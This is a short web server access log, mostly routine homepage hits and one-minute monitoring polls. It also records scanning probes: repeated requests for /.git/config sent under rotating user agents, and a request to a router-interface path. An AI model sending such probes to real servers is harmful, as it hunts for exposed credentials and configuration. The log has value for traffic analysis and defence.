36.89.129.213 - - [05/Sep/2024:07:52:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.224.128.47 - - [05/Sep/2024:07:52:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [05/Sep/2024:07:53:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.247 - - [05/Sep/2024:07:53:53 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "Hello"
212.91.246.72 - - [05/Sep/2024:07:54:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Sep/2024:07:54:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:55:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:07:56:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.92.249.4 - - [05/Sep/2024:07:56:45 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
185.191.126.213 - - [05/Sep/2024:07:56:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
91.92.249.4 - - [05/Sep/2024:07:57:19 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
91.92.249.4 - - [05/Sep/2024:07:57:19 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 11; moto g(40) fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
212.91.246.72 - - [05/Sep/2024:07:57:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [05/Sep/2024:07:57:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.92.249.4 - - [05/Sep/2024:07:58:07 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0"
91.92.249.4 - - [05/Sep/2024:07:58:27 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0"
91.92.249.4 - - [05/Sep/2024:07:58:27 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1"
212.91.246.72 - - [05/Sep/2024:07:58:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [05/Sep/2024:07:58:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Sep/2024:07:59:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:08:00:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:08:01:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [05/Sep/2024:08:01:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.39.118 - - [05/Sep/2024:08:02:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [05/Sep/2024:08:02:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Sep/2024:08:03:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [05/Sep/2024:08:04:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
